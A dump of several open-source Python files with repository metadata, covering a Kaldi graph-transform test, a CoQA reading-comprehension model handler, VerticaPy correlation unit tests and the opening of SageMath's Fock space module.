'kind': 'data',
'op': 'Result',
}
}
def test_remove_out_data_for_memory(self):
graph = build_graph(self.nodes,
[
('input_node', 'memory_node'),
('memory_node', 'output_node'),
('output_node', 'op_output')
])
KaldiRemoveMemoryOutputBackReplacementPattern().find_and_replace_pattern(graph)
self.assertNotIn('output_node', graph.node)
def test_do_not_remove_out_data_for_memory(self):
graph = build_graph(self.nodes,
[
('input_node', 'memory_node'),
('memory_node', 'output_node'),
])
KaldiRemoveMemoryOutputBackReplacementPattern().find_and_replace_pattern(graph)
self.assertIn('output_node', graph.node)
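if __name__ == '__main__':
    # Optional entry point (an addition, not in the upstream file): lets the module be
    # run directly, in addition to the usual pytest/unittest discovery.
    unittest.main()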
| 33.282609
| 107
| 0.530372
|
e5c34ab0d06992ccf38cfa6ecd9d993f547983ae
| 12,775
|
py
|
Python
|
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | 6
|
2019-01-23T09:16:56.000Z
|
2020-06-01T10:00:42.000Z
|
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | null | null | null |
rc/model_handler.py
|
jayelm/coqa-baselines
|
12f3380f1437a7b26a05c68bbd193a2c9f59238a
|
[
"MIT"
] | 2
|
2019-07-30T16:23:45.000Z
|
2019-12-16T19:46:04.000Z
|
import time
from utils.data_utils import prepare_datasets
from utils import constants as Constants
from model import Model
import torch
import os
import json
from torch.utils.data import DataLoader
from utils.timer import Timer
from utils.logger import ModelLogger
from utils.eval_utils import AverageMeter
from utils.data_utils import sanitize_input, vectorize_input, sanitize_input_dialog_batched, vectorize_input_dialog_batched
class ModelHandler(object):
"""High level model_handler that trains/validates/tests the network,
tracks and logs metrics.
"""
def __init__(self, config):
self.logger = ModelLogger(config, dirname=config['dir'], pretrained=config['pretrained'])
self.dirname = self.logger.dirname
cuda = config['cuda']
cuda_id = config['cuda_id']
if not cuda:
self.device = torch.device('cpu')
else:
self.device = torch.device('cuda' if cuda_id < 0 else 'cuda:%d' % cuda_id)
datasets = prepare_datasets(config)
train_set = datasets['train']
dev_set = datasets['dev']
test_set = datasets['test']
# Evaluation Metrics:
self._train_loss = AverageMeter()
self._train_f1 = AverageMeter()
self._train_em = AverageMeter()
self._dev_f1 = AverageMeter()
self._dev_em = AverageMeter()
if train_set:
self.train_loader = DataLoader(train_set, batch_size=config['batch_size'],
shuffle=config['shuffle'], collate_fn=lambda x: x, pin_memory=True)
self._n_train_batches = len(train_set) // config['batch_size']
else:
self.train_loader = None
if dev_set:
self.dev_loader = DataLoader(dev_set, batch_size=config['batch_size'],
shuffle=False, collate_fn=lambda x: x, pin_memory=True)
self._n_dev_batches = len(dev_set) // config['batch_size']
else:
self.dev_loader = None
if test_set:
self.test_loader = DataLoader(test_set, batch_size=config['batch_size'], shuffle=False,
collate_fn=lambda x: x, pin_memory=True)
self._n_test_batches = len(test_set) // config['batch_size']
self._n_test_examples = len(test_set)
else:
self.test_loader = None
self._n_train_examples = 0
self.model = Model(config, train_set)
self.model.network = self.model.network.to(self.device)
self.config = self.model.config
self.is_test = False
def train(self):
if self.train_loader is None or self.dev_loader is None:
print("No training set or dev set specified -- skipped training.")
return
self.is_test = False
timer = Timer("Train")
self._epoch = self._best_epoch = 0
if self.dev_loader is not None:
print("\n>>> Dev Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.dev_loader, training=False, verbose=self.config['verbose'])
timer.interval("Validation Epoch {}".format(self._epoch))
format_str = "Validation Epoch {} -- F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._dev_f1.mean(), self._dev_em.mean()))
self._best_f1 = self._dev_f1.mean()
self._best_em = self._dev_em.mean()
if self.config['save_params']:
self.model.save(self.dirname)
self._reset_metrics()
while self._stop_condition(self._epoch):
self._epoch += 1
print("\n>>> Train Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.train_loader, training=True, verbose=self.config['verbose'])
train_epoch_time = timer.interval("Training Epoch {}".format(self._epoch))
format_str = "Training Epoch {} -- Loss: {:0.4f}, F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._train_loss.mean(),
self._train_f1.mean(), self._train_em.mean()))
print("\n>>> Dev Epoch: [{} / {}]".format(self._epoch, self.config['max_epochs']))
self._run_epoch(self.dev_loader, training=False, verbose=self.config['verbose'])
timer.interval("Validation Epoch {}".format(self._epoch))
format_str = "Validation Epoch {} -- F1: {:0.2f}, EM: {:0.2f} --"
print(format_str.format(self._epoch, self._dev_f1.mean(), self._dev_em.mean()))
if self._best_f1 <= self._dev_f1.mean(): # Can be one of loss, f1, or em.
self._best_epoch = self._epoch
self._best_f1 = self._dev_f1.mean()
self._best_em = self._dev_em.mean()
if self.config['save_params']:
self.model.save(self.dirname)
print("!!! Updated: F1: {:0.2f}, EM: {:0.2f}".format(self._best_f1, self._best_em))
self._reset_metrics()
self.logger.log(self._train_loss.last, Constants._TRAIN_LOSS_EPOCH_LOG)
self.logger.log(self._train_f1.last, Constants._TRAIN_F1_EPOCH_LOG)
self.logger.log(self._train_em.last, Constants._TRAIN_EM_EPOCH_LOG)
self.logger.log(self._dev_f1.last, Constants._DEV_F1_EPOCH_LOG)
self.logger.log(self._dev_em.last, Constants._DEV_EM_EPOCH_LOG)
self.logger.log(train_epoch_time, Constants._TRAIN_EPOCH_TIME_LOG)
timer.finish()
self.training_time = timer.total
print("Finished Training: {}".format(self.dirname))
print(self.summary())
def test(self):
if self.test_loader is None:
print("No testing set specified -- skipped testing.")
return
self.is_test = True
self._reset_metrics()
timer = Timer("Test")
output = self._run_epoch(self.test_loader, training=False, verbose=0,
out_predictions=self.config['out_predictions'],
out_attentions=self.config['save_attn_weights'])
if self.config['dialog_batched']:
# Slightly different id format
_id = None
turn = 0
for ex in output:
if ex['id'] != _id:
_id = ex['id']
turn = 0
ex['id'] = _id
ex['turn_id'] = turn
turn += 1
else:
for ex in output:
_id = ex['id']
ex['id'] = _id[0]
ex['turn_id'] = _id[1]
if self.config['out_predictions']:
output_file = os.path.join(self.dirname, Constants._PREDICTION_FILE)
with open(output_file, 'w') as outfile:
json.dump(output, outfile, indent=4)
if self.config['out_predictions_csv']:
import pandas as pd
for o in output:
o['gold_answer_1'], o['gold_answer_2'], o['gold_answer_3'], o['gold_answer_4'] = o['gold_answers']
output_csv = pd.DataFrame(output)
output_csv = output_csv[[
'id', 'turn_id', 'span_start', 'span_end',
'answer',
'gold_answer_1',
'gold_answer_2',
'gold_answer_3',
'gold_answer_4',
'f1', 'em'
]]
output_csv.to_csv(output_file.replace('.json', '.csv'),
index=False)
test_f1 = self._dev_f1.mean()
test_em = self._dev_em.mean()
timer.finish()
print(self.report(self._n_test_batches, None, test_f1, test_em, mode='test'))
self.logger.log([test_f1, test_em], Constants._TEST_EVAL_LOG)
print("Finished Testing: {}".format(self.dirname))
def _run_epoch(self, data_loader, training=True, verbose=10, out_predictions=False, out_attentions=None):
start_time = time.time()
output = []
for step, input_batch in enumerate(data_loader):
if self.config['dialog_batched']:
x_batches = []
for ib in input_batch:
ib_sanitized = sanitize_input_dialog_batched(ib, self.config, self.model.word_dict,
self.model.feature_dict, training=training)
x_batch = vectorize_input_dialog_batched(ib_sanitized, self.config, training=training,
device=self.device)
if not x_batch:
continue # When there are no target spans present in the batch
x_batches.append(x_batch)
else:
input_batch = sanitize_input(input_batch, self.config, self.model.word_dict,
self.model.feature_dict, training=training)
x_batch = vectorize_input(input_batch, self.config, training=training,
device=self.device)
if not x_batch:
continue # When there are no target spans present in the batch
x_batches = [x_batch] # Singleton list.
res = self.model.predict(x_batches, update=training, out_predictions=out_predictions, out_attentions=out_attentions)
loss = res['loss']
f1 = res['f1']
em = res['em']
total_ex = sum(xb['batch_size'] for xb in x_batches)
self._update_metrics(loss, f1, em, total_ex, training=training)
if training:
self._n_train_examples += total_ex
if (verbose > 0) and (step % verbose == 0):
mode = "train" if training else ("test" if self.is_test else "dev")
print(self.report(step, loss, f1 * 100, em * 100, mode))
print('used_time: {:0.2f}s'.format(time.time() - start_time))
if out_predictions:
for id, prediction, span, f1, em, ans in zip(res['ids'], res['predictions'], res['spans'], res['f1s'], res['ems'], res['answers']):
output.append({'id': id,
'answer': prediction,
'span_start': span[0],
'span_end': span[1],
'f1': f1,
'em': em,
'gold_answers': ans})
return output
def report(self, step, loss, f1, em, mode='train'):
if mode == "train":
format_str = "[train-{}] step: [{} / {}] | exs = {} | loss = {:0.4f} | f1 = {:0.2f} | em = {:0.2f}"
return format_str.format(self._epoch, step, self._n_train_batches, self._n_train_examples, loss, f1, em)
elif mode == "dev":
return "[predict-{}] step: [{} / {}] | f1 = {:0.2f} | em = {:0.2f}".format(
self._epoch, step, self._n_dev_batches, f1, em)
elif mode == "test":
return "[test] | test_exs = {} | step: [{} / {}] | f1 = {:0.2f} | em = {:0.2f}".format(
self._n_test_examples, step, self._n_test_batches, f1, em)
else:
            raise ValueError('mode = {} not supported.'.format(mode))
def summary(self):
start = " <<<<<<<<<<<<<<<< MODEL SUMMARY >>>>>>>>>>>>>>>> "
info = "Best epoch = {}\nDev F1 = {:0.2f}\nDev EM = {:0.2f}".format(
self._best_epoch, self._best_f1, self._best_em)
end = " <<<<<<<<<<<<<<<< MODEL SUMMARY >>>>>>>>>>>>>>>> "
return "\n".join([start, info, end])
def _update_metrics(self, loss, f1, em, batch_size, training=True):
if training:
self._train_loss.update(loss, batch_size)
self._train_f1.update(f1 * 100, batch_size)
self._train_em.update(em * 100, batch_size)
else:
self._dev_f1.update(f1 * 100, batch_size)
self._dev_em.update(em * 100, batch_size)
def _reset_metrics(self):
self._train_loss.reset()
self._train_f1.reset()
self._train_em.reset()
self._dev_f1.reset()
self._dev_em.reset()
def _stop_condition(self, epoch):
"""
        Check that we have not exceeded the maximum number of epochs and have
        not gone 10 epochs without improvement.
        """
        no_improvement = epoch >= self._best_epoch + 10
        exceeded_max_epochs = epoch >= self.config['max_epochs']
        return not (exceeded_max_epochs or no_improvement)
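if __name__ == '__main__':
    # Hedged usage sketch: in the repository the `config` dict is normally built from
    # command-line arguments elsewhere; the keys below are only the ones read directly
    # by ModelHandler (prepare_datasets needs additional dataset-path keys), and the
    # values are illustrative assumptions.
    example_config = {
        'cuda': False, 'cuda_id': -1, 'dir': 'out', 'pretrained': None,
        'batch_size': 32, 'shuffle': True, 'max_epochs': 10, 'verbose': 10,
        'save_params': True, 'out_predictions': False, 'out_predictions_csv': False,
        'save_attn_weights': None, 'dialog_batched': False,
    }
    handler = ModelHandler(example_config)
    handler.train()
    handler.test()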
| 45.462633
| 147
| 0.55319
|
5f5dabc13dc38625ae81cd1c0915d182b65c104e
| 16,074
|
py
|
Python
|
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | 1
|
2018-10-08T07:15:26.000Z
|
2018-10-08T07:15:26.000Z
|
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | null | null | null |
verticapy/tests/vDataFrame/test_vDF_correlation.py
|
oualib/VerticaPy
|
387a037df575540ec928ad1834c5b775818d8b98
|
[
"Apache-2.0"
] | null | null | null |
# (c) Copyright [2018-2021] Micro Focus or one of its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest, warnings
import matplotlib.pyplot as plt
from verticapy import vDataFrame, drop
from verticapy import set_option
set_option("print_info", False)
@pytest.fixture(scope="module")
def titanic_vd(base):
from verticapy.datasets import load_titanic
titanic = load_titanic(cursor=base.cursor)
yield titanic
with warnings.catch_warnings(record=True) as w:
drop(
name="public.titanic", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def amazon_vd(base):
from verticapy.datasets import load_amazon
amazon = load_amazon(cursor=base.cursor)
yield amazon
with warnings.catch_warnings(record=True) as w:
drop(
name="public.amazon", cursor=base.cursor,
)
class TestvDFCorrelation:
def test_vDF_acf(self, amazon_vd):
        # spearman method
result1 = amazon_vd.acf(
ts="date",
column="number",
p=20,
by=["state"],
unit="month",
method="spearman",
)
plt.close("all")
assert result1["value"][0] == pytest.approx(1)
assert result1["confidence"][0] == pytest.approx(0.024396841824873748, 1e-2)
assert result1.values["value"][10] == pytest.approx(0.494663471420921, 1e-2)
assert result1.values["confidence"][10] == pytest.approx(
0.06977116419369607, 1e-2
)
# pearson method
result2 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=[1, 3, 6, 7],
unit="year",
method="pearson",
)
plt.close("all")
assert result2["value"][0] == pytest.approx(1)
assert result2["confidence"][0] == pytest.approx(0.024396841824873748, 1e-2)
assert result2["value"][4] == pytest.approx(0.367, 1e-2)
assert result2["confidence"][4] == pytest.approx(0.04080280865931269, 1e-2)
# Autocorrelation Heatmap for each 'month' lag
result3 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=12,
unit="month",
method="pearson",
round_nb=3,
acf_type="heatmap",
)
plt.close("all")
assert result3["index"][1].replace('"', "") == "lag_12_number"
assert result3["number"][1] == pytest.approx(0.778, 1e-2)
assert result3["index"][5].replace('"', "") == "lag_10_number"
assert result3["number"][5] == pytest.approx(0.334, 1e-2)
# Autocorrelation Line for each 'month' lag
result4 = amazon_vd.acf(
ts="date",
column="number",
by=["state"],
p=12,
unit="month",
method="pearson",
acf_type="line",
)
plt.close("all")
assert result4["value"][1] == pytest.approx(0.752, 1e-2)
assert result4["confidence"][1] == pytest.approx(0.03627598368700659, 1e-2)
assert result4["value"][6] == pytest.approx(-0.06, 1e-2)
assert result4["confidence"][6] == pytest.approx(0.05273251493184901, 1e-2)
def test_vDF_corr(self, titanic_vd):
#
# PEARSON
#
# testing vDataFrame.corr (method = 'pearson')
result1 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="pearson",
)
plt.close("all")
assert result1["survived"][0] == 1.0
assert result1["survived"][1] == pytest.approx(-0.0422446185581737, 1e-2)
assert result1["survived"][2] == pytest.approx(0.264150360783869, 1e-2)
assert result1["age"][0] == pytest.approx(-0.0422446185581737, 1e-2)
assert result1["age"][1] == 1.0
assert result1["age"][2] == pytest.approx(0.178575164117464, 1e-2)
assert result1["fare"][0] == pytest.approx(0.264150360783869, 1e-2)
assert result1["fare"][1] == pytest.approx(0.178575164117464, 1e-2)
assert result1["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'pearson') with focus
result1_f = titanic_vd.corr(method="pearson", focus="survived",)
plt.close("all")
assert result1_f["survived"][1] == pytest.approx(-0.336, 1e-2)
assert result1_f["survived"][2] == pytest.approx(0.264, 1e-2)
#
# SPEARMAN
#
# testing vDataFrame.corr (method = 'spearman')
titanic_vd_gb = titanic_vd.groupby(
["age"], ["AVG(survived) AS survived", "AVG(fare) AS fare"]
)
titanic_vd_gb = titanic_vd_gb.groupby(
["fare"], ["AVG(age) AS age", "AVG(survived) AS survived"]
)
titanic_vd_gb = titanic_vd_gb.groupby(
["survived"], ["AVG(age) AS age", "AVG(fare) AS fare"]
)
result2 = titanic_vd_gb.corr(
columns=["survived", "age", "fare"], method="spearman",
)
plt.close("all")
assert result2["survived"][0] == 1.0
assert result2["survived"][1] == pytest.approx(-0.221388367729831, 1e-2)
assert result2["survived"][2] == pytest.approx(0.425515947467167, 1e-2)
assert result2["age"][0] == pytest.approx(-0.221388367729831, 1e-2)
assert result2["age"][1] == 1.0
assert result2["age"][2] == pytest.approx(0.287617260787992, 1e-2)
assert result2["fare"][0] == pytest.approx(0.425515947467167, 1e-2)
assert result2["fare"][1] == pytest.approx(0.287617260787992, 1e-2)
assert result2["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'spearman') with focus
result2_f = titanic_vd_gb.corr(focus="survived", method="spearman",)
plt.close("all")
assert result2_f["survived"][1] == pytest.approx(0.425515947467167, 1e-2)
assert result2_f["survived"][2] == pytest.approx(-0.221388367729831, 1e-2)
#
# KENDALL
#
# testing vDataFrame.corr (method = 'kendall')
result3 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="kendall",
)
plt.close("all")
assert result3["survived"][0] == 1.0
assert result3["survived"][1] == pytest.approx(-0.0149530691050183, 1e-2)
assert result3["survived"][2] == pytest.approx(0.264138930414481, 1e-2)
assert result3["age"][0] == pytest.approx(-0.0149530691050183, 1e-2)
assert result3["age"][1] == 1.0
assert result3["age"][2] == pytest.approx(0.0844989716189637, 1e-2)
assert result3["fare"][0] == pytest.approx(0.264138930414481, 1e-2)
assert result3["fare"][1] == pytest.approx(0.0844989716189637, 1e-2)
assert result3["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'kendall') with focus
result3_f = titanic_vd.corr(focus="survived", method="kendall",)
plt.close("all")
assert result3_f["survived"][1] == pytest.approx(-0.317426126117454, 1e-2)
assert result3_f["survived"][2] == pytest.approx(0.264138930414481, 1e-2)
#
# BISERIAL POINT
#
# testing vDataFrame.corr (method = 'biserial')
result4 = titanic_vd.corr(
columns=["survived", "age", "fare"], method="biserial",
)
plt.close("all")
assert result4["survived"][0] == 1.0
assert result4["survived"][1] == pytest.approx(-0.0422234273762242, 1e-2)
assert result4["survived"][2] == pytest.approx(0.264043222121672, 1e-2)
assert result4["age"][0] == pytest.approx(-0.0422234273762242, 1e-2)
assert result4["age"][1] == 1.0
assert result4["fare"][0] == pytest.approx(0.264043222121672, 1e-2)
assert result4["fare"][2] == 1.0
# testing vDataFrame.corr (method = 'biserial') with focus
result4_f = titanic_vd.corr(focus="survived", method="biserial",)
plt.close("all")
assert result4_f["survived"][1] == pytest.approx(-0.335720838027055, 1e-2)
assert result4_f["survived"][2] == pytest.approx(0.264043222121672, 1e-2)
#
# CRAMER'S V
#
# testing vDataFrame.corr (method = 'cramer')
result5 = titanic_vd.corr(
columns=["survived", "pclass", "embarked"], method="cramer"
)
plt.close("all")
assert result5["survived"][0] == 1.0
assert result5["survived"][1] == pytest.approx(0.3358661117846154, 1e-2)
assert result5["survived"][2] == pytest.approx(0.18608072188932145, 1e-2)
assert result5["pclass"][0] == pytest.approx(0.3358661117846154, 1e-2)
assert result5["pclass"][1] == 1.0
assert result5["pclass"][2] == pytest.approx(0.27453049870161333, 1e-2)
assert result5["embarked"][0] == pytest.approx(0.18608072188932145, 1e-2)
assert result5["embarked"][1] == pytest.approx(0.27453049870161333, 1e-2)
assert result5["embarked"][2] == 1.0
# testing vDataFrame.corr (method = 'cramer') with focus
result5_f = titanic_vd.corr(focus="survived", method="cramer",)
plt.close("all")
assert result5_f["survived"][1] == pytest.approx(0.73190924565401, 1e-2)
assert result5_f["survived"][2] == pytest.approx(0.6707486879228794, 1e-2)
def test_vDF_corr_pvalue(self, titanic_vd):
assert titanic_vd.corr_pvalue("age", "fare", "pearson") == (
pytest.approx(0.178575164117468, 1e-2),
pytest.approx(1.3923308548466764e-08, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "spearman") == (
pytest.approx(0.0045193585753828, 1e-2),
pytest.approx(0.8899833744540833, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallA") == (
pytest.approx(0.12796714496175657, 1e-2),
pytest.approx(1.4735187810450437e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallB") == (
pytest.approx(0.0844989716189637, 1e-2),
pytest.approx(1.1056646764730614e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("age", "fare", "kendallC") == (
pytest.approx(0.12919864967860847, 1e-2),
pytest.approx(1.1056646764730614e-09, 1e-2),
)
assert titanic_vd.corr_pvalue("survived", "fare", "biserial") == (
pytest.approx(0.264043222121672, 1e-2),
pytest.approx(4.097598100216442e-21, 1e-2),
)
assert titanic_vd.corr_pvalue("survived", "pclass", "cramer") == (
pytest.approx(0.3358661117846154, 1e-2),
pytest.approx(3.507947423216931e-61, 1e-2),
)
def test_vDF_cov(self, titanic_vd):
# testing vDataFrame.cov
result = titanic_vd.cov(columns=["survived", "age", "fare"],)
plt.close("all")
assert result["survived"][0] == pytest.approx(0.231685181342251, 1e-2)
assert result["survived"][1] == pytest.approx(-0.297583583247234, 1e-2)
assert result["survived"][2] == pytest.approx(6.69214075159394, 1e-2)
assert result["age"][0] == pytest.approx(-0.297583583247234, 1e-2)
assert result["age"][1] == pytest.approx(208.169014723609, 1e-2)
assert result["age"][2] == pytest.approx(145.057125218791, 1e-2)
assert result["fare"][0] == pytest.approx(6.69214075159394, 1e-2)
assert result["fare"][1] == pytest.approx(145.057125218791, 1e-2)
assert result["fare"][2] == pytest.approx(2769.36114247479, 1e-2)
# testing vDataFrame.cov with focus
result_f = titanic_vd.cov(
columns=["survived", "age", "fare"], focus="survived",
)
assert result_f["survived"][0] == pytest.approx(6.69214075159394, 1e-2)
assert result_f["survived"][1] == pytest.approx(-0.297583583247234, 1e-2)
assert result_f["survived"][2] == pytest.approx(0.231685181342251, 1e-2)
plt.close("all")
def test_vDF_iv_woe(self, titanic_vd):
# testing vDataFrame.iv_woe
result = titanic_vd.iv_woe("survived",)
plt.close("all")
assert result["iv"][0] == pytest.approx(0.552533238835721)
assert result["iv"][1] == pytest.approx(0.498896347729338)
assert result["iv"][2] == pytest.approx(0.21502042620992767)
# testing vDataFrame[].iv_woe
result2 = titanic_vd["pclass"].iv_woe("survived",)
assert result2["iv"][-1] == pytest.approx(0.21502042620992767)
assert result2["non_events"][-1] == pytest.approx(784)
def test_vDF_pacf(self, amazon_vd):
# testing vDataFrame.pacf
result = amazon_vd.pacf(
column="number", ts="date", by=["state"], p=5,
)
plt.close("all")
assert result["value"][0] == 1.0
assert result["value"][1] == pytest.approx(0.672667529541858, 1e-2)
assert result["value"][2] == pytest.approx(-0.188727403801382, 1e-2)
assert result["value"][3] == pytest.approx(0.022206688265849, 1e-2)
assert result["value"][4] == pytest.approx(-0.0819798501305434, 1e-2)
assert result["value"][5] == pytest.approx(-0.00663606854011195, 1e-2)
def test_vDF_regr(self, titanic_vd):
# testing vDataFrame.regr (method = 'alpha')
result1 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="alpha",
)
plt.close("all")
assert result1["survived"][0] == 0.0
assert result1["survived"][1] == pytest.approx(0.435280333103508, 1e-2)
assert result1["survived"][2] == pytest.approx(0.282890247028015, 1e-2)
assert result1["age"][0] == pytest.approx(30.6420462046205, 1e-2)
assert result1["age"][1] == 0.0
assert result1["age"][2] == pytest.approx(28.4268042866199, 1e-2)
assert result1["fare"][0] == pytest.approx(23.425595019157, 1e-2)
assert result1["fare"][1] == pytest.approx(16.1080039795446, 1e-2)
assert result1["fare"][2] == 0.0
# testing vDataFrame.regr (method = 'beta')
result2 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="beta"
)
plt.close("all")
assert result2["survived"][0] == 1.0
assert result2["survived"][1] == pytest.approx(-0.00142952871080426, 1e-2)
assert result2["survived"][2] == pytest.approx(0.00241649261591561, 1e-2)
assert result2["age"][0] == pytest.approx(-1.2483889156179, 1e-2)
assert result2["age"][1] == 1.0
assert result2["age"][2] == pytest.approx(0.0456059549185254, 1e-2)
assert result2["fare"][0] == pytest.approx(28.8746643141762, 1e-2)
assert result2["fare"][1] == pytest.approx(0.69923081967147, 1e-2)
assert result2["fare"][2] == 1.0
# testing vDataFrame.regr (method = 'r2')
result3 = titanic_vd.regr(
columns=["survived", "age", "fare"], method="r2",
)
plt.close("all")
assert result3["survived"][0] == 1.0
assert result3["survived"][1] == pytest.approx(0.00178460779712559, 1e-2)
assert result3["survived"][2] == pytest.approx(0.0697754131022489, 1e-2)
assert result3["age"][0] == pytest.approx(0.00178460779712559, 1e-2)
assert result3["age"][1] == 1.0
assert result3["age"][2] == pytest.approx(0.0318890892395806, 1e-2)
assert result3["fare"][0] == pytest.approx(0.0697754131022489, 1e-2)
assert result3["fare"][1] == pytest.approx(0.0318890892395806, 1e-2)
assert result3["fare"][2] == 1.0
| 43.918033
| 84
| 0.596678
|
33e9eb0d686a4c3a2fe38b47707d1f72142e00a0
| 82,500
|
py
|
Python
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 1,742
|
2015-01-04T07:06:13.000Z
|
2022-03-30T11:32:52.000Z
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 66
|
2015-03-19T19:17:24.000Z
|
2022-03-16T11:59:30.000Z
|
src/sage/algebras/quantum_groups/fock_space.py
|
UCD4IDS/sage
|
43474c96d533fd396fe29fe0782d44dc7f5164f7
|
[
"BSL-1.0"
] | 495
|
2015-01-10T10:23:18.000Z
|
2022-03-24T22:06:11.000Z
|
# -*- coding: utf-8 -*-
r"""
Fock Space
AUTHORS:
- Travis Scrimshaw (2013-05-03): Initial version
"""
# ****************************************************************************
# Copyright (C) 2013-2017 Travis Scrimshaw <tcscrims at gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.structure.global_options import GlobalOptions
from sage.categories.modules_with_basis import ModulesWithBasis
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.fraction_field import FractionField
from sage.rings.finite_rings.integer_mod_ring import IntegerModRing
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.partition import (_Partitions, Partitions,
RegularPartitions_truncated)
from sage.combinat.partition_tuple import PartitionTuples
from sage.algebras.quantum_groups.q_numbers import q_factorial
#############################
## Fock space options
class FockSpaceOptions(GlobalOptions):
r"""
Sets and displays the global options for elements of the Fock
space classes. If no parameters are set, then the function
returns a copy of the options dictionary.
The ``options`` to Fock space can be accessed as the method
:obj:`FockSpaceOptions` of :class:`FockSpace` and
related parent classes.
@OPTIONS@
EXAMPLES::
sage: FS = FockSpace(4)
sage: F = FS.natural()
sage: x = F.an_element()
sage: y = x.f(3,2,2,0,1)
sage: y
((3*q^2+3)/q)*|3, 3, 1> + (3*q^2+3)*|3, 2, 1, 1>
sage: Partitions.options.display = 'diagram'
sage: y
((3*q^2+3)/q)*|3, 3, 1> + (3*q^2+3)*|3, 2, 1, 1>
sage: ascii_art(y)
((3*q^2+3)/q)*|***\ + (3*q^2+3)*|***\
|*** > |** \
|* / |* /
|* /
sage: FockSpace.options.display = 'list'
sage: ascii_art(y)
((3*q^2+3)/q)*F + (3*q^2+3)*F
*** ***
*** **
* *
*
sage: Partitions.options.display = 'compact_high'
sage: y
((3*q^2+3)/q)*F3^2,1 + (3*q^2+3)*F3,2,1^2
sage: Partitions.options._reset()
sage: FockSpace.options._reset()
"""
NAME = 'FockSpace'
module = 'sage.algebras.quantum_groups.fock_space'
display = dict(default="ket",
description='Specifies how terms of the natural basis of Fock space should be printed',
values=dict(ket='displayed as a ket in bra-ket notation',
list='displayed as a list'),
case_sensitive=False)
###############################################################################
## Fock space
class FockSpace(Parent, UniqueRepresentation):
r"""
The (fermionic) Fock space of `U_q(\widehat{\mathfrak{sl}}_n)` with
multicharge `(\gamma_1, \ldots, \gamma_m)`.
Fix a positive integer `n > 1` and fix a sequence
`\gamma = (\gamma_1, \ldots, \gamma_m)`, where `\gamma_i \in \ZZ / n \ZZ`.
*(fermionic) Fock space* `\mathcal{F}` with multicharge `\gamma` is a
`U_q(\widehat{\mathfrak{gl}}_n)`-representation with a basis
`\{ |\lambda \rangle \}`, where `\lambda` is a partition tuple of
level `m`. By considering `\mathcal{F}` as a
`U_q(\widehat{\mathfrak{sl}}_n)`-representation,
it is not irreducible, but the submodule generated by
`| \emptyset^m \rangle` is isomorphic to the highest weight module
`V(\mu)`, where the highest weight `\mu = \sum_i \Lambda_{\gamma_i}`.
Let `R_i(\lambda)` and `A_i(\lambda)` be the set of removable and
addable, respectively, `i`-cells of `\lambda`, where an `i`-cell is
a cell of residue `i` (i.e., content modulo n).
The action of `U_q(\widehat{\mathfrak{sl}}_n)` is given as follows:
.. MATH::
\begin{aligned}
e_i | \lambda \rangle & = \sum_{c \in R_i(\lambda)}
        q^{M_i(\lambda, c)} | \lambda - c \rangle, \\
        f_i | \lambda \rangle & = \sum_{c \in A_i(\lambda)}
        q^{N_i(\lambda, c)} | \lambda + c \rangle, \\
q^{h_i} | \lambda \rangle & = q^{N_i(\lambda)} | \lambda \rangle, \\
q^d | \lambda \rangle & = q^{-N^{(0)}(\lambda)} | \lambda \rangle,
\end{aligned}
where
- `M_i(\lambda, c)` (resp. `N_i(\lambda, c)`) is the number of removable
(resp. addable) `i`-cells of `\lambda` below (resp. above) `c` minus
the number of addable (resp. removable) `i`-cells of `\lambda` below
(resp. above) `c`,
- `N_i(\lambda)` is the number of addable `i`-cells minus the number of
removable `i`-cells, and
- `N^{(0)}(\lambda)` is the total number of `0`-cells of `\lambda`.
Another interpretation of Fock space is as a semi-infinite wedge
product (which each factor we can think of as fermions). This allows
